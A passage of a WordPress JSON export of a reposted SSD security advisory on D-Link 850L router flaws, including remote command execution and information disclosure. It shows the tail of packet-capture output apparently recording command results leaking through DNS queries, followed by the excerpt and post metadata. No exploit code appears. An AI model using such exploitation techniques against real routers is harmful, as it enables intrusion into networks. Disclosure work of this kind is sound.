class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-36\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.980401<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.35172<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-37\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.980422<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-38\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.983041<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.60090<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3364\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 08 Aug 2017 08:49:00 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describe three (3) vulnerabilities found in D-Link 850L router. The vulnerabilities have been reported as part of Hack2Win competition, for more information about Hack2Win &#8211; Hack2Win &#8211; https:\/\/blogs.securiteam.com\/index.php\/archives\/3310. The vulnerabilities found in D-Link 850L are: Remote Command Execution via WAN and LAN Remote Unauthenticated Information Disclosure via WAN and LAN &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3364\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 D-Link 850L Multiple Vulnerabilities (Hack2Win
Contest)<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11591,12603,11851,10757,12136,12686],"class_list":["post-8641","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-file-disclosure","tag-hack2win","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action","tag-unrestricted-file-upload"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8641"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8641\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}